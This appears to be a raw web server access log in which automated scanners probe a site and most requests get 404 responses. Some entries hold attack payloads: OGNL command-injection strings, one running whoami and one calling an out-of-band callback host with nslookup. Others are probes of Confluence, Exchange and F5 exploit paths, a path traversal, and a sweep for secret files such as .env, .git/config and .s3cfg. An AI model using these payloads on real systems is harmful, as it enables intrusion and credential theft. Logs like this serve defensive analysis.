156.59.198.136 - - [03/Apr/2025:22:51:12 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11293585.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.162.202 - - [03/Apr/2025:22:52:07 +0200] "GET /cron.php?cron_type=tidy_cache&sid=2e166afe84ae8479215c228b11c6e681 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:22:52:07 +0200] "GET /cron.php?cron_type=tidy_cache&sid=2e166afe84ae8479215c228b11c6e681 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:22:52:08 +0200] "GET /cron.php?cron_type=tidy_cache&sid=2e166afe84ae8479215c228b11c6e681 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [03/Apr/2025:22:56:10 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11951578.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.162.202 - - [03/Apr/2025:22:59:06 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7ea3c83d947bd126bf08a530dae55c77 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:22:59:06 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7ea3c83d947bd126bf08a530dae55c77 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:22:59:07 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7ea3c83d947bd126bf08a530dae55c77 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:23:03:14 +0200] "GET /download/file.php?id=244&sid=489a54e46b609caea9d005e76fa2da01 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:23:03:25 +0200] "GET /download/file.php?id=244&sid=489a54e46b609caea9d005e76fa2da01 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
172.202.117.221 - - [03/Apr/2025:23:11:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
151.106.162.202 - - [03/Apr/2025:23:12:52 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=8&image_id=107&sid=fee15a89b8e31e942ed6fbfe0f423160 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:23:13:03 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=8&image_id=107&sid=fee15a89b8e31e942ed6fbfe0f423160 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [03/Apr/2025:23:22:47 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11043622.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [03/Apr/2025:23:22:56 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11977527.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.162.202 - - [03/Apr/2025:23:32:07 +0200] "GET /cron.php?cron_type=tidy_cache&sid=92de0f1ac9f06d7e8fd9c27dd7833794 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:23:32:17 +0200] "GET /cron.php?cron_type=tidy_cache&sid=92de0f1ac9f06d7e8fd9c27dd7833794 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
77.90.153.48 - - [03/Apr/2025:23:32:54 +0200] "\x16\x03\x01" 400 383 "-" "-"
77.90.153.48 - - [03/Apr/2025:23:32:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
77.90.153.48 - - [03/Apr/2025:23:33:15 +0200] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 404 440 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20"
77.90.153.48 - - [03/Apr/2025:23:33:16 +0200] "GET /pfblockerng/www/index.php HTTP/1.1" 404 370 "-" "-"
77.90.153.48 - - [03/Apr/2025:23:33:17 +0200] "GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
77.90.153.48 - - [03/Apr/2025:23:33:18 +0200] "POST /users/user-dark-features HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0 ) Gecko/20100101 Firefox/128.0"
77.90.153.48 - - [03/Apr/2025:23:33:18 +0200] "GET /setup/setupadministrator-start.action HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0"
77.90.153.48 - - [03/Apr/2025:23:33:19 +0200] "GET /php/ztp_gate.php/.js.map HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Apr/2025:23:33:19 +0200] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.18"
77.90.153.48 - - [03/Apr/2025:23:33:19 +0200] "POST /confluence/pages/createpage-entervariables.action HTTP/1.1" 404 308 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36"
77.90.153.48 - - [03/Apr/2025:23:33:19 +0200] "POST /pages/createpage-entervariables.action HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
77.90.153.48 - - [03/Apr/2025:23:33:19 +0200] "POST /wiki/pages/createpage-entervariables.action HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_4; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
77.90.153.48 - - [03/Apr/2025:23:33:19 +0200] "POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 308 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
77.90.153.48 - - [03/Apr/2025:23:33:19 +0200] "POST /pages/doenterpagevariables.action HTTP/1.1" 404 298 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
77.90.153.48 - - [03/Apr/2025:23:33:19 +0200] "POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.13.10 (KHTML, like Gecko) Version/17.2.97 Safari/616.13.10"
77.90.153.48 - - [03/Apr/2025:23:33:19 +0200] "POST /templates/editor-preload-container HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1"
77.90.153.48 - - [03/Apr/2025:23:33:19 +0200] "POST /template/custom/content-editor HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Apr/2025:23:33:19 +0200] "POST /pages/createpage.action?spaceKey=myproj HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Apr/2025:23:33:19 +0200] "POST /pages/templates2/viewpagetemplate.action HTTP/1.1" 404 300 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Apr/2025:23:33:20 +0200] "POST /pages/createpage-entervariables.action HTTP/1.1" 404 301 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Apr/2025:23:33:20 +0200] "POST /webtools/control/main/ProgramExport HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"
77.90.153.48 - - [03/Apr/2025:23:33:21 +0200] "POST /mgmt/tm/util/bash HTTP/1.1" 404 289 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
77.90.153.48 - - [03/Apr/2025:23:33:30 +0200] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cvnehj19gkqaqauenbn03bmb7xbit4dq7.oast.live%22%29%7D/ HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0"
77.90.153.48 - - [03/Apr/2025:23:33:30 +0200] "GET /pfblockerng/www/index.php HTTP/1.1" 400 504 "-" "-"
77.90.153.48 - - [03/Apr/2025:23:33:32 +0200] "GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.19.3 (KHTML, like Gecko) Version/17.6.11 Safari/616.19.3"
77.90.153.48 - - [03/Apr/2025:23:33:32 +0200] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2vEVqdU23KfGjGpCwnpeplIkjZ8 HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
77.90.153.48 - - [03/Apr/2025:23:33:35 +0200] "POST /mgmt/tm/util/bash HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
77.90.153.48 - - [03/Apr/2025:23:33:46 +0200] "GET /setup/setupadministrator-start.action HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
77.90.153.48 - - [03/Apr/2025:23:34:00 +0200] "POST /setup/setupadministrator.action HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
77.90.153.48 - - [03/Apr/2025:23:34:09 +0200] "POST /dologin.action HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.46"
77.90.153.48 - - [03/Apr/2025:23:34:12 +0200] "GET /welcome.action HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0"
151.106.162.202 - - [03/Apr/2025:23:35:03 +0200] "GET /cron.php?cron_type=tidy_warnings&sid=9886d3ac24b820191e97e9ef986636e6 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:23:35:03 +0200] "GET /cron.php?cron_type=tidy_warnings&sid=9886d3ac24b820191e97e9ef986636e6 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
45.131.46.156 - - [03/Apr/2025:23:36:54 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
151.106.162.202 - - [03/Apr/2025:23:41:30 +0200] "GET /download/file.php?id=252&sid=2683d9dd381f3fcaaff06c36a17affcd HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:23:41:30 +0200] "GET /download/file.php?id=252&sid=2683d9dd381f3fcaaff06c36a17affcd HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:23:41:55 +0200] "GET /cron.php?cron_type=tidy_cache&sid=38486d53cf4f08ab915ff4bc72243391 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:23:41:55 +0200] "GET /cron.php?cron_type=tidy_cache&sid=38486d53cf4f08ab915ff4bc72243391 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:23:41:55 +0200] "GET /cron.php?cron_type=tidy_cache&sid=38486d53cf4f08ab915ff4bc72243391 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
78.153.140.177 - - [03/Apr/2025:23:45:00 +0200] "\x16\x03\x01" 400 383 "-" "-"
78.153.140.177 - - [03/Apr/2025:23:45:00 +0200] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SCH-I200PP Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.177 - - [03/Apr/2025:23:45:00 +0200] "GET /config/secrets.yml HTTP/1.1" 404 363 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30"
78.153.140.177 - - [03/Apr/2025:23:45:00 +0200] "GET /.env.1 HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J111F Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.5 Chrome/38.0.2125.102 Mobile Safari/537.36"
78.153.140.177 - - [03/Apr/2025:23:45:00 +0200] "GET /.env.2 HTTP/1.1" 404 351 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
78.153.140.177 - - [03/Apr/2025:23:45:00 +0200] "GET /.env1 HTTP/1.1" 404 350 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; wbx 1.0.0)"
78.153.140.177 - - [03/Apr/2025:23:45:00 +0200] "GET /.env_2 HTTP/1.1" 404 351 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/33.0.1750.152 Chrome/33.0.1750.152 Safari/537.36"
78.153.140.177 - - [03/Apr/2025:23:45:00 +0200] "GET /.git/config HTTP/1.1" 404 356 "-" "Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14"
78.153.140.177 - - [03/Apr/2025:23:45:00 +0200] "GET /.phpinfo HTTP/1.1" 404 353 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_1 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0 Mobile/15C153 Safari/604.1"
78.153.140.177 - - [03/Apr/2025:23:45:01 +0200] "GET /.production.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36"
78.153.140.177 - - [03/Apr/2025:23:45:01 +0200] "GET /.powenv HTTP/1.1" 404 352 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
78.153.140.177 - - [03/Apr/2025:23:45:01 +0200] "GET /.profile HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
78.153.140.177 - - [03/Apr/2025:23:45:01 +0200] "GET /.s3cfg HTTP/1.1" 404 351 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.16) Gecko/20110323 Ubuntu/10.10 (maverick) Firefox/3.6.16"
78.153.140.177 - - [03/Apr/2025:23:45:03 +0200] "GET /_info.php HTTP/1.1" 404 354 "-" "Opera/9.80 (Windows NT 10.0; Win64; x64) Presto/2.12.388 Version/39.0"
78.153.140.177 - - [03/Apr/2025:23:45:03 +0200] "GET /_phpinfo.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:55.0) Gecko/20100101 Firefox/55.0"
78.153.140.177 - - [03/Apr/2025:23:45:03 +0200] "GET /_poopinfo.php HTTP/1.1" 404 358 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"
78.153.140.177 - - [03/Apr/2025:23:45:03 +0200] "GET /_profiler/info HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows NT 5.2; U; de; rv:1.8.0) Gecko/20060728 Firefox/1.5.0"
78.153.140.177 - - [03/Apr/2025:23:45:03 +0200] "GET /_profiler/phpinfo.php HTTP/1.1" 404 366 "-" "Mozilla/5.0 (iPad; CPU OS 5_0_1 like Mac OS X) qjyBrowser/77618.1.15526 AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A405 Safari/7534.48.3"
78.153.140.177 - - [03/Apr/2025:23:45:04 +0200] "GET /_profiler/phpinfo/info.php HTTP/1.1" 404 371 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SCH-L710 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.177 - - [03/Apr/2025:23:45:04 +0200] "GET /app.conf HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G955U Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.116 Mobile Safari/537.36"
78.153.140.177 - - [03/Apr/2025:23:45:04 +0200] "GET /app.config HTTP/1.1" 404 355 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.3 (KHTML, like Gecko) Version/11.0 Mobile/15D5049a Safari/604.1"
78.153.140.177 - - [03/Apr/2025:23:45:04 +0200] "GET /app.json HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1"
78.153.140.177 - - [03/Apr/2025:23:45:04 +0200] "GET /app.yaml HTTP/1.1" 404 353 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
78.153.140.177 - - [03/Apr/2025:23:45:04 +0200] "GET /config.env HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/14.0.1"
78.153.140.177 - - [03/Apr/2025:23:45:04 +0200] "GET /config.json HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30"
78.153.140.177 - - [03/Apr/2025:23:45:04 +0200] "GET /../../web.config HTTP/1.1" 400 373 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36"
78.153.140.177 - - [03/Apr/2025:23:45:05 +0200] "GET /.bash_history HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1"
78.153.140.177 - - [03/Apr/2025:23:45:05 +0200] "GET /.bash_profile HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22"
78.153.140.177 - - [03/Apr/2025:23:45:05 +0200] "GET /.bashrc HTTP/1.1" 404 352 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; it-it; HUAWEI Y600-U20 Build/HUAWEIY600-U20) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.177 - - [03/Apr/2025:23:45:05 +0200] "GET /.editorconfig HTTP/1.1" 404 358 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; BOIE9;ENCA)"
78.153.140.177 - - [03/Apr/2025:23:45:05 +0200] "GET /.flaskenv HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/419.2.1 (KHTML, like Gecko) Safari/419.3"
156.59.198.135 - - [03/Apr/2025:23:47:06 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10482332.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.162.202 - - [03/Apr/2025:23:52:35 +0200] "GET /download/file.php?id=254&sid=51f0ea219f7cd92aaecdabc9d7f6fc44 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [03/Apr/2025:23:52:45 +0200] "GET /download/file.php?id=254&sid=51f0ea219f7cd92aaecdabc9d7f6fc44 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.35 - - [04/Apr/2025:00:00:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [04/Apr/2025:00:07:09 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10319769.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [04/Apr/2025:00:07:18 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11354028.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.162.202 - - [04/Apr/2025:00:08:51 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4bc2b5e039c2feeff4040d05f89d8150 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:00:08:52 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4bc2b5e039c2feeff4040d05f89d8150 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:00:08:52 +0200] "GET /cron.php?cron_type=tidy_cache&sid=4bc2b5e039c2feeff4040d05f89d8150 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [04/Apr/2025:00:18:38 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11170992.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
151.106.162.202 - - [04/Apr/2025:00:18:51 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b8b96f59052fd818d98563dfbfd520fa HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:00:18:54 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b8b96f59052fd818d98563dfbfd520fa HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:00:18:55 +0200] "GET /cron.php?cron_type=tidy_cache&sid=b8b96f59052fd818d98563dfbfd520fa HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.34 - - [04/Apr/2025:00:33:18 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [04/Apr/2025:00:33:22 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
151.106.162.202 - - [04/Apr/2025:00:51:23 +0200] "GET /download/file.php?id=255&sid=c7819a043b79c1d4c9defa902ceb4186 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:00:51:24 +0200] "GET /download/file.php?id=255&sid=c7819a043b79c1d4c9defa902ceb4186 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [04/Apr/2025:00:51:24 +0200] "GET /download/file.php?id=255&sid=c7819a043b79c1d4c9defa902ceb4186 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.34 - - [04/Apr/2025:00:59:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
133.175.54.224 - - [04/Apr/2025:01:02:03 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
64.226.117.46 - - [04/Apr/2025:01:03:17 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
64.226.117.46 - - [04/Apr/2025:01:03:17 +0200] "GET /odinhttpcall1743715813 HTTP/1.1" 404 367 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.226.117.46 - - [04/Apr/2025:01:03:17 +0200] "POST /sdk HTTP/1.1" 404 348 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
